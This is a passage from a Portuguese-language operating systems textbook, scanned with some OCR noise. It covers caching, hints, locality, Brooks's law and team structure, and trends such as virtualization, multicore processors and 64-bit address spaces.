Figura 12.8(a). Cada valor aqui é um valor de 24 bits, 
e cada um dos 8 bits dá a intensidade do vermelho, do 
verde e do azul. A imagem GIF é mostrada na Figura 
12.8(b). Nesse caso, cada valor é um índice de 8 bits 
para a palheta de cores. Esta é armazenada como parte 
do arquivo de imagem e é mostrada na Figura 12.8(c). 
Na verdade, há mais coisas a mencionar sobre o formato 
GIF, mas o cerne da questão é a pesquisa em tabela. 

Existe outro modo de reduzir o tamanho da imagem, 
o qual ilustra uma ponderação diferente. PostScript é 
uma linguagem de programação que pode ser usada 
para descrever imagens. (Na verdade, qualquer lin- 
guagem de programação pode descrever imagens, mas 
PostScript é modelada para esse propósito.) Muitas im- 
pressoras têm um interpretador PostScript embutido, a 
fim de executar programas PostScript enviados a elas. 

Por exemplo, se existe um bloco retangular de pixels 
em uma imagem, todos com a mesma cor, um programa 
PostScript para a referida imagem deve executar ins- 
truções para desenhar um retângulo em certa posição e 
depois preenchê-lo com uma determinada cor. Somente 
alguns bits são necessários para emitir esse comando. 
Quando a imagem é recebida pela impressora, um inter- 
pretador local deve executar o programa para construir 
a imagem. Assim, PostScript realiza a compactação de 
dados sob pena de um custo maior de computação — 
uma ponderação diferente daquela realizada por meio 
de pesquisa em tabela, mas muito valiosa quando a me- 
mória ou a largura de banda é escassa. 


Outras ponderações muitas vezes envolvem estru- 
turas de dados. As listas duplamente encadeadas usam 
mais memória do que as listas com encadeamento sim- 
ples, mas frequentemente permitem acesso mais rápi- 
do aos itens. As tabelas de espalhamento gastam ainda 
mais espaço, mas são ainda mais rápidas. Em resumo, 
um dos principais fatores a serem considerados ao oti- 
mizar uma parte de código é ponderar se o uso de di- 
ferentes estruturas de dados proporcionará uma melhor 
relação custo-benefício em termos de espaço/tempo. 


12.4.4 Uso de cache 


Uma técnica bem conhecida para melhoria de desem- 
penho é o uso de cache. Ela se aplica sempre que existir 
a probabilidade de o mesmo resultado ser necessário vá- 
rias vezes. A abordagem geral é fazer o trabalho todo da 
primeira vez e depois guardar o resultado na memória 
cache. Nas tentativas subsequentes, a cache é verificada 
em primeiro lugar. Se o resultado estiver nela, ele será 
usado. Caso contrário, o trabalho todo será refeito. 

Já vimos o uso de caches dentro do sistema de arqui- 
vos para conter certa quantidade de blocos do disco re- 
centemente usados, economizando, assim, uma leitura 
de disco a cada acerto. Contudo, as caches podem servir 
a muitos outros propósitos. Por exemplo, a análise sin- 
tática dos nomes dos caminhos de diretórios é surpreen- 
dentemente cara. Considere novamente o exemplo do 
UNIX mostrado na Figura 4.34. Para procurar /usr/ast/ 
mbox são necessários os seguintes acessos ao disco: 


1. Ler o i-node para o diretório-raiz (i-node 1). 
2. Ler o diretório-raiz (bloco 1). 
3. Ler o i-node para /usr (i-node 6). 


le W ES (a) Parte de uma imagem não compactada com 24 bits por pixel. (b) A mesma parte compactada com GIF, com oito bits 


por pixel. (c) A palheta de cores. 


24 Bits 





(a) 


24 Bits 


(b) (c) 


4. Ler o diretório /usr (bloco 132). 
5. Ler o i-node para /usr/ast (i-node 26). 
6. Ler o diretório /usr/ast (bloco 406). 


Essa operação gasta seis acessos ao disco só para 
descobrir o número do i-node do arquivo. Em seguida, 
o próprio i-node deve ser lido para que se descubram os 
números dos blocos do disco. Se o arquivo é menor do 
que o tamanho do bloco (por exemplo, 1024 bytes), ele 
gasta oito acessos ao disco para ler os dados. 

Alguns sistemas otimizam a análise sintática do 
nome do caminho usando o caching de combinações 
(caminho, i-node). Para o exemplo da Figura 4.34, a 
cache certamente conterá as primeiras três entradas da 
Figura 12.9 após analisar /usr/ast/mbox. As últimas três 
entradas surgem da análise de outros caminhos. 

Quando um caminho precisa ser procurado, o anali- 
sador de nomes primeiro consulta a cache, procurando 
nela a maior subcadeia ali presente. Por exemplo, se o 
caminho /usr/ast/grants/erc é submetido, a cache retor- 
na a informação de que a subcadeia /usr/ast é o i-node 
26, permitindo que a pesquisa possa começar nele, eli- 
minando quatro acessos ao disco. 

Um problema com o uso de cache de caminhos é que 
o mapeamento entre o nome do arquivo e o número do 
i-node não é fixo durante todo o tempo. Suponha que o 
arquivo /usr/ast/mbox seja removido do sistema e seu i- 
-node seja reutilizado para um arquivo diferente perten- 
cente a um usuário diferente. Posteriormente, o arquivo 
/usr/ast/mbox é criado de novo e, nesse momento, rece- 
be o número de i-node 106. Se nada for feito para evitar 
essa situação, a entrada da cache estará, então, incorreta 
e as procuras subsequentes retornarão um número de 
i-node errado. Por essa razão, quando se remove um ar- 
quivo ou um diretório, sua entrada na cache e (caso seja 
um diretório) todas as entradas abaixo dela devem ser 
removidas da cache. 

Os blocos do disco e os nomes dos caminhos não são 
os únicos itens que podem ser colocados em cache. Os 


[eU A:] Parte da cache de i-nodes para a Figura 4.34. 
































Caminho Número do i-node 
/usr 6 
/usr/ast 26 
/usr/ast/mbox 60 
/usr/ast/books 92 
/usr/bal 45 
/usr/bal/paper.ps 85 
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i-nodes também o podem. Se threads pop-up são usados 
para tratar das interrupções, cada um deles requer uma 
pilha e algum mecanismo adicional. Esses threads pre- 
viamente usados também podem ser colocados na ca- 
che, visto que o aproveitamento de um thread já usado 
é mais fácil do que a criação de um novo a partir do 
zero (para evitar a alocação de memória). Em suma, 
qualquer coisa difícil de produzir pode ser colocada 
na cache. 


12.4.5 Dicas 


As entradas na cache estão sempre corretas. Uma 
pesquisa na cache pode falhar, mas, se uma entrada é 
encontrada, ela tem a garantia de estar correta e pode 
ser usada sem mais cerimônia. Em alguns sistemas, é 
conveniente ter uma tabela de dicas, que são sugestões 
sobre a solução, mas sem garantia de estarem certas. O 
próprio chamador deve verificar se o resultado é correto. 

Um exemplo bem conhecido de dicas é o uso dos 
URLs embutidos nas páginas da web. O clique em um 
link não garante que a página apontada esteja presente. 
Na realidade, a página apontada pode ter sido removida 
dez anos antes. Assim, a informação sobre a indicação 
da página realmente é apenas uma dica. 

As dicas também são empregadas na conexão com 
arquivos remotos. A informação é uma dica que diz 
algo sobre o arquivo remoto, como onde ele está lo- 
calizado. Contudo, o arquivo pode ter sido movido ou 
removido desde o registro da dica, de modo que uma 
verificação sempre é necessária para confirmar se a 
dica está correta. 


12.4.6 Exploração da localidade 


Processos e programas não agem aleatoriamente. 
Eles apresentam uma quantidade razoável de localida- 
de no tempo e no espaço e, para melhorar o desem- 
penho, essa informação pode ser explorada de várias 
maneiras. Um exemplo bem conhecido de localidade 
espacial é o fato de que os processos não saltam alea- 
toriamente dentro de seus espaços de endereçamento, 
mas tendem a usar um número relativamente pequeno 
de páginas durante um dado intervalo de tempo. As pá- 
ginas que um processo está usando ativamente podem 
ser marcadas como seu conjunto de trabalho (working 
set) e o sistema operacional pode garantir que, quando 
o processo tiver a permissão de executar, seu conjunto 
de trabalho estará na memória, reduzindo, assim, o nú- 
mero de faltas de páginas. 
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O princípio da localidade também se aplica aos ar- 
quivos. Quando um processo seleciona um diretório de 
trabalho específico, é provável que muitas de suas refe- 
rências futuras a arquivos sejam para arquivos daque- 
le diretório. Colocar todos os i-nodes e os arquivos de 
cada diretório juntos no disco proporciona melhoras no 
desempenho. Esse princípio é o utilizado no Berkeley 
Fast File System (MCKUSICK et al., 1984). 

Outra área na qual a localidade exerce um papel im- 
portante é a de escalonamento de threads em multipro- 
cessadores. Como vimos no Capítulo 8, uma maneira de 
escalonar threads em um multiprocessador é tentar exe- 
cutar cada thread na mesma CPU em que ele foi execu- 
tado da última vez, na esperança de que alguns de seus 
blocos de memória ainda estejam na cache da memória. 


12.4.7 Otimização do caso comum 


Em geral, é uma boa ideia diferenciar entre o caso 
mais comum e o pior caso possível e tratá-los de modo 
diferente. Muitas vezes os códigos para as duas situa- 
ções são totalmente diversos. É importante tornar o caso 
comum rápido. Para o pior caso, se ele ocorre raramen- 
te, é suficiente torná-lo correto. 

Como um primeiro exemplo, considere a entrada em 
uma região crítica. Na maior parte do tempo, a entrada é 
bem-sucedida, especialmente quando os processos não 
gastam muito tempo dentro das regiões críticas. O Win- 
dows 8 tira proveito dessa expectativa provendo uma 
chamada da WinAPI, EnterCriticalSection, que testa 
atomicamente uma condição no modo usuário (usando 
TSL ou equivalente). Se o teste é satisfatório, o processo 
apenas entra na região crítica e nenhuma chamada de 
núcleo se faz necessária. Se o teste falha, a rotina de 
biblioteca executa um down em um semáforo para blo- 
quear o processo. Assim, no caso normal, não há a ne- 
cessidade de qualquer chamada de núcleo. No Capítulo 
2, vimos que futexes no Linux também são otimizados 
para o caso comum de nenhuma disputa. 

Como segundo exemplo, considere o uso de um 
alarme (usando sinais do UNIX). Se nenhum alarme se 
encontra pendente, criar uma entrada e colocá-la na fila 
do temporizador é simples e direto. Contudo, se existe 
algum alarme pendente, ele deve ser encontrado e re- 
movido da fila do temporizador. Visto que a chamada 
alarm não especifica se já existe ou não um alarme es- 
tabelecido, o sistema deve assumir o pior caso. Entre- 
tanto, como na maior parte do tempo não há qualquer 
alarme pendente e visto que a remoção de um alarme 
existente é custosa, pode ser bastante útil diferenciar en- 
tre esses dois casos. 


Uma maneira de fazer isso é manter um bit na tabela 
de processos para informar se algum alarme está pen- 
dente. Se o bit se encontra desligado, adota-se a solução 
fácil (apenas se adiciona uma nova entrada na fila do 
temporizador sem verificação). Se o bit está ligado, a 
fila do temporizador deve ser verificada. 


12.5 Gerenciamento de projeto 


Programadores são otimistas incorrigíveis. A maio- 
ria acha que escrever um programa é correr até o teclado 
e começar a digitar e, logo em seguida, o programa to- 
talmente depurado é finalizado. Para programas muito 
grandes, não se trabalha assim. Nas seções seguintes, 
abordaremos alguns pontos sobre gerenciamento de 
grandes projetos de software, especialmente projetos de 
grandes sistemas operacionais. 


12.5.1 O mítico homem-mês 


Em seu livro clássico, The Mythical Man Month, 
Fred Brooks, um dos projetistas do OS/360, que mais 
tarde ingressou no mundo acadêmico, investigou por 
que é tão difícil construir grandes sistemas operacionais 
(BROOKS, 1975, 1995). Quando a maioria dos pro- 
gramadores soube que Brooks afirmara que eles eram 
capazes de produzir somente mil linhas de código depu- 
rado por ano em grandes projetos, eles indagaram se o 
professor Brooks estaria vivendo no espaço sideral, tal- 
vez no Planeta Bug. Afinal de contas, a maioria deles se 
lembrava de ter produzido um programa de mil linhas 
em uma única noite. Como isso poderia ser o resultado 
anual de alguém com um QI superior a 50? 

O que Brooks queria dizer é que os projetos gran- 
des, com centenas de programadores, são comple- 
tamente diferentes dos projetos pequenos e que os 
resultados obtidos em projetos pequenos não escalam 
para projetos maiores. Em um projeto grande, é consu- 
mido muito tempo no planejamento de como dividir a 
tarefa em módulos, especificando cuidadosamente os 
módulos e suas interfaces e tentando imaginar como 
esses módulos irão interagir, mesmo antes de começar 
a codificação. Em seguida, os módulos devem ser im- 
plementados e depurados separadamente. Por fim, os 
módulos têm de ser integrados e o sistema completo 
precisa ser testado. O caso normal é cada módulo fun- 
cionar de modo perfeito quando testado isoladamente, 
mas o sistema quebra instantaneamente quando todas 
as peças são colocadas juntas. Brooks estimou o traba- 
lho como: 


1/3 planejamento 

1/6 codificação 

1/4 teste dos módulos 
1/4 teste do sistema 


Em outras palavras, escrever o código é a parte fá- 
cil. O difícil é visualizar quais módulos devem existir e 
fazer com que o módulo 4 converse corretamente com 
o módulo B. Em um programa pequeno escrito por um 
único programador, tudo o que lhe resta é a parte fácil. 

O título do livro de Brooks surgiu de sua afirmação 
de que pessoas e tempo não são intercambiáveis. Não 
existe uma unidade como um homem-mês (ou uma pes- 
soa-mês). Se um projeto utiliza 15 pessoas durante dois 
anos para ser construído, não é concebível que 360 pes- 
soas possam fazê-lo em um mês e provavelmente não é 
possível ter 60 pessoas para fazê-lo em seis meses. 

Existem três razões para isso. Primeiro, o trabalho 
não pode sofrer paralelismo total. Até que o planeja- 
mento tenha sido feito e se tenha determinado quais 
módulos são necessários e quais serão suas interfaces, 
nenhum código pode ser sequer iniciado. Em um pro- 
jeto de dois anos, o planejamento pode consumir, sozi- 
nho, cerca de oito meses. 

Segundo, para utilizar totalmente um grande número 
de programadores, o trabalho deve ser dividido em um 
grande número de módulos, de maneira que todos te- 
nham algo para fazer. Visto que cada módulo consegue 
potencialmente interagir com outro, o número de intera- 
ções módulo-módulo que precisa ser considerado cres- 
ce em função do quadrado do número de módulos, isto 
é, como o quadrado do número de programadores. Essa 
complexidade rapidamente sai de controle. Medições 
cuidadosas de 63 projetos de software confirmaram que 
a ponderação entre pessoas e meses está longe de ser 
linear para grandes projetos (BOEHM, 1981). 

Terceiro, a depuração é altamente sequencial. Esta- 
belecer dez depuradores para um problema não torna a 
descoberta do defeito dez vezes mais rápida. Na realida- 
de, dez depuradores provavelmente são mais lentos do 
que um, pois desperdiçarão muito tempo conversando 
uns com os outros. 

Brooks resume sua experiência ponderando pessoas 
e tempo na lei de Brooks: 


Aumentar o número de envolvidos em um projeto de 
software atrasado faz com que ele atrase ainda mais. 


O problema é que as pessoas que entram depois pre- 
cisam ser treinadas no projeto, os módulos precisam ser 
redivididos para se adequarem ao número maior de pro- 
gramadores agora disponíveis, muitas reuniões serão 
necessárias para coordenar todos os esforços, e assim 
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por diante. Abdel-Hamid e Madnick (1991) confirma- 
ram essa lei experimentalmente. Uma versão um tanto 
irreverente da lei de Brooks é: 


São necessários nove meses para gerar uma crian- 
ça, não importando quantas mulheres você empre- 
gue para o trabalho. 


12.5.2 Estrutura da equipe 


Sistemas operacionais comerciais são grandes pro- 
jetos de software e invariavelmente requerem grandes 
equipes de pessoas. A capacidade dessas pessoas é 
imensamente importante. Durante décadas tem-se ob- 
servado que os bons programadores são dez vezes mais 
produtivos do que os programadores ruins (SACKMAN 
et al., 1968). O preocupante é que, quando você precisa 
de 200 programadores, é difícil encontrar 200 bons pro- 
gramadores — é preciso aceitar vários níveis de quali- 
dade dentro de uma equipe. 

O que também é importante em qualquer grande pro- 
jeto, de software ou não, é a necessidade de coerência 
arquitetural. Deve existir uma mente controlando o pro- 
jeto. Brooks cita a catedral de Reims, na França, como 
exemplo de um grande projeto que levou décadas para 
ser construído e no qual os arquitetos que chegavam 
posteriormente subordinavam seus desejos de colocar 
uma marca pessoal no projeto à realização dos planos 
do arquiteto inicial. O resultado é uma coerência arqui- 
tetural não encontrada em outras catedrais da Europa. 

Na década de 1970, Harlan Mills combinou a obser- 
vação de que alguns programadores são muito melhores 
do que os outros com a necessidade de coerência arqui- 
tetural para propor o paradigma da equipe do progra- 
mador-chefe (BAKER, 1972). Sua ideia era organizar 
uma equipe de programação como uma equipe cirúrgi- 
ca, em vez de uma equipe de abatedores de porcos: em 
vez de saírem todos golpeando como loucos, uma pes- 
soa segura o escalpo e todos os outros estão lá para dar 
suporte. Para um projeto de dez pessoas, Mills sugere a 
estrutura em equipe da Figura 12.10. 

Três décadas se passaram desde que isso foi pro- 
posto e colocado em prática. Algumas coisas mudaram 
(como a necessidade de um advogado de linguagens — 
C é mais simples do que PL/I), mas a necessidade de 
ter somente uma mente controlando o projeto ainda é 
válida. Essa mente deve ser capaz de trabalhar 100% no 
projeto e na programação; daí a necessidade de um gru- 
po de suporte, embora, com a ajuda de um computador, 
um pequeno grupo seria suficiente hoje em dia. Mas, na 
essência, a ideia ainda funciona. 
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IFIGURA 12.10) Proposta de Mills para montar uma equipe de dez pessoas com programadores-chefe. 





Titulo 


Obrigações 





Programador-chefe 


Executa o projeto arquitetural e escreve o código 





Copiloto 


Ajuda o programador-chefe e serve como um porto seguro 





Administrador 


Gerencia pessoas, orçamento, espaço, equipamentos, relatórios etc. 





Editor 


Edita a documentação, que deve ser escrita pelo programador-chefe 





Secretárias 


Secretárias para o administrador e o editor 





Secretário de programas 


Mantém os arquivos de código e documentação 





Ferramenteiro 


Testador 


Fornece qualquer ferramenta de que o programador-chefe precise 


Testa o código do programador-chefe 











Advogado de linguagens 


Profissional de tempo parcial que possa assessorar o programador-chefe em relação à linguagem 








Qualquer projeto grande precisa ser organizado de 
maneira hierárquica. No mais baixo nível existem mui- 
tas equipes pequenas, cada qual liderada por um pro- 
gramador-chefe. No nível seguinte, grupos de equipes 
devem ser coordenados por um gerente. A experiência 
mostra que cada pessoa que você gerencia lhe custa 10% 
de seu tempo, de modo que um gerente em tempo inte- 
gral é necessário para cada grupo de dez equipes. Esses 
gerentes devem ser gerenciados, e assim por diante. 

Brooks observou que as más notícias não se movem 
bem para o topo da árvore. Jerry Saltzer, do MIT, cha- 
mou esse efeito de diodo das más notícias. Nenhum 
programador-chefe ou gerente quer dizer a seu chefe 
que o projeto está quatro meses atrasado e que não há 
a menor possibilidade de cumprir o prazo combinado, 
pois existe uma velha tradição, de mais de dois mil 
anos, na qual o mensageiro é degolado quando traz más 
notícias. Em consequência, a alta gerência muitas vezes 
fica no escuro com relação ao estado real do projeto. 
Quando se torna óbvio que o prazo não pode ser cum- 
prido em condição alguma, a alta gerência reage com 
pânico, acrescentando pessoas, momento no qual a lei 
de Brooks entra em cena. 

Na prática, as grandes empresas — que têm tido uma 
longa experiência na produção de software e sabem o 
que ocorre se ele é produzido com descuido — têm 
uma tendência a pelo menos tentar fazê-lo direito. Em 
contraste, empresas pequenas e novatas, extremamente 
apressadas em ganhar o mercado, nem sempre tomam 
precauções para produzir seus softwares com cuidado. 
Essa pressa muitas vezes ocasiona resultados longe do 
ideal. 

Nem Brooks nem Mills previram que cresceria o 
movimento em prol do código aberto. Embora mui- 
tos tivessem dúvida (especialmente aqueles liderando 
grandes empresas de software de código fechado), o 


software de código aberto tem sido um tremendo suces- 
so. De grandes servidores a dispositivos embarcados, e 
de sistemas de controle industrial a smartphones por- 
táteis, o software de código aberto está em toda par- 
te. Grandes empresas como Google e IBM agora estão 
lançando seu peso nas costas do Linux e contribuem 
intensamente no código. O notável é que os projetos 
de software de código aberto mais bem-sucedidos têm 
usado o modelo de programador-chefe com uma mente 
controlando o projeto arquitetural (por exemplo, Linus 
Torvalds para o núcleo do Linux e Richard Stallman 
para o compilador GNU C). 


12.5.3 O papel da experiência 


Ter projetistas experientes é fundamental para o pro- 
jeto de um sistema operacional. Brooks aponta que a 
maioria dos erros não está no código, mas no projeto. 
Os programadores fazem corretamente aquilo que lhes 
foi ordenado fazer. Mas aquilo que lhes mandaram fazer 
estava errado. Nenhuma quantidade de software de teste 
detectará as más especificações. 

A solução de Brooks visa a abandonar o modelo de 
desenvolvimento clássico da Figura 12.11(a) e usar o 
modelo da Figura 12.11(b). Nesse caso, a ideia é pri- 
meiro escrever um programa principal que simplesmen- 
te chama os procedimentos de nível superior — que 
inicialmente são apenas rotinas vazias (dummies). Já no 
primeiro dia do projeto, o sistema pode ser compilado e 
executado, embora ainda não faça nada. À medida que 
o tempo passa, os módulos são inseridos para substituir 
o código antes vazio. O resultado disso é que o teste 
de integração do sistema é realizado continuamente, 
de modo que os erros no projeto aparecem muito mais 
cedo. Em consequência, percebem-se as más decisões 
de projeto muito antes no ciclo. 


Capítulo 12 PROJETO DE SISTEMAS OPERACIONAIS | 711 


[FIGURA 12.11 | (a) O projeto tradicional de software prossegue em estágios. (b) O projeto alternativo produz um sistema que funciona 


(mas não faz nada) já no primeiro dia. 
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Pouco conhecimento é algo perigoso. Brooks obser- 
vou aquilo que ele chamou de efeito do segundo sis- 
tema. Muitas vezes o primeiro produto de uma equipe 
de projeto é pequeno, pois os projetistas estão receosos 
quanto a seu funcionamento correto. Como resultado, 
eles hesitam em colocar muitos recursos. Se o projeto 
é bem-sucedido, eles constroem a continuação do siste- 
ma. Impressionados com o próprio sucesso, na segunda 
vez os projetistas incluem todos os recursos avançados 
e exagerados que foram intencionalmente deixados de 
lado da primeira vez. Resultado: o segundo sistema fica 
inflado e o desempenho degradado. Na terceira vez, eles 
voltam à sobriedade pela falha do segundo sistema e 
novamente se tornam mais cautelosos. 

A dupla CTSS-MULTICS é um exemplo bem apro- 
priado. CTSS foi o primeiro sistema de tempo compar- 
tilhado de propósito geral e um grande sucesso, mesmo 
tendo uma funcionalidade mínima. Seu sucessor, o 
MULTICS, foi tão ambicioso que sofreu as consequén- 
cias. As ideias eram boas, mas havia tantas coisas novas 
que o sistema funcionou precariamente durante anos e 
nunca foi um grande êxito comercial. O terceiro siste- 
ma nessa linha de desenvolvimento, o UNIX, foi muito 
mais cauteloso e de muito maior sucesso. 


12.5.4 Não há bala de prata 


Além de The Mythical Men Month, Brooks também 
escreveu um artigo muito influente chamado “Não há 
bala de prata” (“No Silver Bullet”, BROOKS, 1987). 
Nesse artigo, ele argumentou que nenhuma das muitas 
soluções prometidas por diversos fabricantes seria ca- 
paz de oferecer a melhora de uma ordem de grandeza 





Programa 
principal 


Procedimento 
vazio 
il 


(b) 


na produtividade de software dentro de uma década. A 
experiência mostra que ele estava certo. 

Entre as balas de prata propostas estão as linguagens 
de alto nivel, a programação orientada a objetos, a in- 
teligência artificial, os sistemas especialistas, a progra- 
mação automática, a programação gráfica, a verificação 
de programas e os ambientes de programação. Talvez 
na próxima década vejamos uma bala de prata, mas tal- 
vez tenhamos de nos contentar com melhoras graduais, 
incrementais. 


12.6 Tendências no projeto de sistemas 
operacionais 


Em 1899, o líder do Departamento de Patentes dos 
Estados Unidos, Charles H. Duell, aconselhou o então 
presidente McKinley a abolir o Escritório de Patentes 
(e com isso seu emprego!), pois, como ele havia afir- 
mado: “Tudo o que podia ser inventado já foi inven- 
tado” (CERF e NAVASKY, 1984). Todavia, Thomas 
Edison apareceu à sua porta a poucos anos depois com 
um conjunto de novos itens, inclusive a luz elétrica, o 
fonógrafo e o projetor de filmes. A ideia é que o mun- 
do está mudando constantemente, e os sistemas opera- 
cionais precisam se adaptar à nova realidade o tempo 
todo. Nesta seção, mencionamos algumas tendências 
que são relevantes hoje para os projetistas de sistemas 
operacionais. 

Para evitar confusão, os desenvolvimentos de 
hardware mencionados a seguir já estão presentes. O 
que não existe é o software de sistema operacional para 
usá-los com eficiência. Em geral, quando aparece um 
hardware novo, o que todos fazem é simplesmente jogar 
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o software antigo (Linux, Windows etc.) nele e dizer 
que está pronto. Com o passar do tempo, isso é uma má 
ideia. O que precisamos é de software inovador para 
lidar com um hardware inovador. Se você é estudante 
de ciência ou engenharia da computação, ou um profis- 
sional de TIC (Tecnologia da Informação e Comunica- 
ções), seu dever de casa é descobrir esse software. 


12.6.1 Virtualização e a nuvem 


A virtualização é uma ideia que definitivamente pe- 
gou — mais uma vez. Ela surgiu pela primeira vez em 
1967, com o sistema IBM CP/CMS, e está de volta com 
força total na plataforma x86. Muitos computadores 
agora possuem hipervisores funcionando na máquina 
pura, conforme ilustra a Figura 12.12; o hipervisor cria 
uma série de máquinas virtuais e cada uma tem seu pró- 
prio sistema operacional. Esse fenômeno foi discutido 
no Capítulo 7, e parece ser a onda do futuro. Hoje, mui- 
tas empresas estão pensando melhor na ideia, virtuali- 
zando outros recursos também. Por exemplo, há muito 
interesse na virtualização do controle de equipamento 
de rede, chegando ao ponto de executar o controle de 
suas redes também na nuvem. Além disso, fornecedores 
e pesquisadores trabalham constantemente para tornar 
os hipervisores melhores, para alguma noção de me- 
lhor: menores, mais rápidos ou com comprováveis pro- 
priedades de isolamento. 


BLU A PAR Um hipervisor executando quatro máquinas 
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12.6.2 Processadores multinúcieo 


Houve um tempo em que a memória era tão escassa 
que o programador conhecia cada byte pessoalmente e 
comemorava seu aniversário. Hoje, os programadores ra- 
ramente se preocupam com o desperdício de alguns me- 
gabytes aqui e ali. Na maioria das aplicações, a memória 
não é mais um recurso escasso. O que acontecerá quando 
os núcleos se tornarem igualmente abundantes? Em ou- 
tras palavras, à medida que os fabricantes colocam mais 
em mais núcleos em um chip, o que acontece se houver 


tantos que um programador deixe de se preocupar com o 
desperdício de alguns núcleos aqui e ali? 

Os processadores multinúcleo já são uma realidade, 
mas os sistemas operacionais para eles não fazem uso 
total de sua capacidade. Na verdade, os principais sis- 
temas operacionais normalmente nem sequer escalam 
além de algumas dezenas de núcleos, e os desenvolve- 
dores estão constantemente lutando para remover todos 
os gargalos que limitam a escalabilidade. 

Uma pergunta óbvia é: o que você fará com todos es- 
ses núcleos? Se você trabalha com um servidor popular, 
que trata de muitos milhares de solicitações de cliente 
por segundo, a resposta pode ser relativamente simples. 
Por exemplo, você pode decidir dedicar um núcleo para 
cada solicitação. Supondo que você não tenha muitos 
problemas com travas, isso poderá funcionar. Mas o que 
você fará com todos esses núcleos nos tablets? 

Outra questão é: que tipo de núcleos desejamos? Nu- 
cleos superescalares, com pipelines profundas e fantás- 
tica execução fora de ordem e especulativa, com altas 
taxas de relógio, podem ser ótimos para o código se- 
quencial, mas não para a sua conta de energia elétrica. 
Eles também não ajudarão muito se a sua tarefa apre- 
sentar muito paralelismo. Muitas aplicações funcionam 
melhor com núcleos menores e mais simples, se tiverem 
muitos deles. Alguns especialistas argumentam em fa- 
vor de multinúcleos heterogêneos, mas as questões con- 
tinuam sendo as mesmas: que núcleos, quantos e em que 
velocidades? E nem sequer falamos da questão de rodar 
um sistema operacional e todas as suas aplicações. O 
sistema operacional será executado em todos os núcleos 
ou em apenas alguns? Haverá uma ou mais pilhas de 
rede? Quanto compartilhamento será necessário? Dedi- 
camos certos núcleos a funções específicas do sistema 
operacional (como redes ou pilhas de armazenamento)? 
Nesse caso, essas funções devem ser replicadas para 
que se obtenha mais escalabilidade”? 

Explorando muitas e diferentes direções, o mundo 
do sistema operacional atualmente está tentando formu- 
lar respostas para essas perguntas. Embora os pesqui- 
sadores possam divergir nas respostas, a maioria deles 
concorda com uma coisa: esse é um momento incrível 
para pesquisa em sistemas! 


12.6.3 Sistemas operacionais com grandes 
espaços de endereçamento 


Com a mudança nos espaços de endereçamento das 
máquinas de 32 para 64 bits, tornam-se possíveis alte- 
rações mais significativas no projeto de sistemas opera- 
cionais. Um espaço de endereçamento de 32 bits não é 


realmente grande. Se você tentar dividir 2” bytes, dan- 
do a cada um do planeta seu próprio byte, não existirão 
bytes suficientes. Em contrapartida, 2% é algo em torno 
de 2 x 10”. Nesse caso, cada um conseguiria seu bloco 
pessoal de 3 GB. 

O que poderíamos fazer com um espaço de ende- 
reçamento de 2 x 10’ bytes? Para começar, eliminar 
o conceito de sistemas de arquivos: todos os arquivos 
poderiam conceitualmente estar contidos na memória 
(virtual) ao mesmo tempo. Afinal, existe espaço sufi- 
ciente lá para mais de um bilhão de filmes completos, 
cada qual compactado para 4 GB. 

Outro uso possível é o armazenamento permanen- 
te de objetos, que poderiam ser criados no espaço de 
endereçamento e mantidos nele até que todas as refe- 
rências tivessem sido esgotadas; nesse momento, eles 
seriam automaticamente removidos. Esses objetos se- 
riam mantidos no espaço de endereçamento, mesmo 
nas situações de desligamento ou reinicialização do 
computador. Com um espaço de endereçamento de 64 
bits, os objetos poderiam ser criados a uma taxa de 100 
MB/s durante cinco mil anos antes que se esgotasse o 
espaço de endereçamento. Obviamente, para armaze- 
nar de fato essa quantidade de dados, seria necessário 
muito armazenamento de disco para o tráfego de pagi- 
nação, mas, pela primeira vez na história, o fator limi- 
tante seria o armazenamento em disco, e não o espaço 
de endereçamento. 

Com grandes quantidades de objetos no espaço de 
endereçamento, passa a ser interessante permitir que 
múltiplos processos executem no mesmo espaço de en- 
dereçamento ao mesmo tempo, a fim de compartilhar 
os objetos de uma maneira mais geral. Esse projeto le- 
varia, é claro, a sistemas operacionais muito diferentes 
dos que temos agora. 

Com endereços de 64 bits, outra questão sobre os 
sistemas operacionais que terá de ser repensada é a 
memória virtual. Com 2™ bytes de espaço de endereça- 
mento virtual e páginas de 8 KB, temos 2º! páginas. As 
tabelas de páginas convencionais não escalam bem para 
esse tamanho, por isso se faz necessário outro esquema. 
As tabelas de páginas invertidas são uma possibilidade, 
mas outras ideias têm sido propostas (TALLURI et al., 
1995). Em todo caso, existe muito espaço para novas 
pesquisas sobre sistemas operacionais de 64 bits. 


12.6.4 Acesso transparente aos dados 


Desde os primórdios da computação, tem havido 
uma forte distinção entre esta máquina e aquela má- 
quina. Se os dados estivessem nesta máquina, você não 
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poderia acessa-los daquela maquina, a menos que pri- 
meiro os transferisse explicitamente. De modo seme- 
lhante, mesmo que você tivesse os dados, não poderia 
usá-los a menos que tivesse o software correto instala- 
do. Esse modelo está mudando. 

Hoje, os usuários esperam que grande parte dos da- 
dos sejam acessíveis de qualquer lugar e a qualquer mo- 
mento. Em geral, isso é feito armazenando os dados na 
nuvem por meio de serviços de armazenamento, como 
Dropbox, GoogleDrive, iCloud e SkyDrive. Todos os 
arquivos armazenados lá podem ser acessados de qual- 
quer dispositivo que tenha uma conexão de rede. Além 
do mais, os programas para acessar os dados geralmen- 
te também residem na nuvem, então você nem sequer 
precisa ter todos os programas instalados. Isso permite 
que as pessoas leiam e modifiquem arquivos de proces- 
samento de textos, planilhas e apresentações usando um 
smartphone em qualquer lugar. Isso costuma ser consi- 
derado progresso. 

Fazer com que isso aconteça de modo transparente 
é complicado e requer soluções de muitos sistemas in- 
teligentes nos bastidores. Por exemplo, o que fazer se 
não houver conexão de rede? Certamente, você não de- 
seja impedir que as pessoas trabalhem. É claro que você 
poderia manter as mudanças localmente em um buffer 
e atualizar o documento mestre quando a conexão fos- 
se restabelecida, mas, e se vários dispositivos tivessem 
feito mudanças conflitantes? Esse é um problema muito 
comum se vários usuários compartilham dados, mas po- 
deria ainda acontecer com um único usuário. Além do 
mais, se 0 arquivo for grande, você não deseja esperar 
muito tempo até que possa acessá-lo. Caching, pré-car- 
regamento e sincronização são questões fundamentais 
nessa situação. Os sistemas operacionais atuais lidam 
com a junção de várias máquinas de modo explícito 
(considerando “explícito” como o oposto de “transpa- 
rente”). Certamente, podemos fazer muito melhor do 
que isso. 


12.6.5 Computadores movidos a bateria 


Poderosos PCs com espaços de endereçamento de 
64 bits, redes com grande largura de banda, múltiplos 
processadores e áudio e vídeo de alta qualidade agora 
são comuns em sistemas desktop, e estão passando ra- 
pidamente para notebooks, tablets e até mesmo smart- 
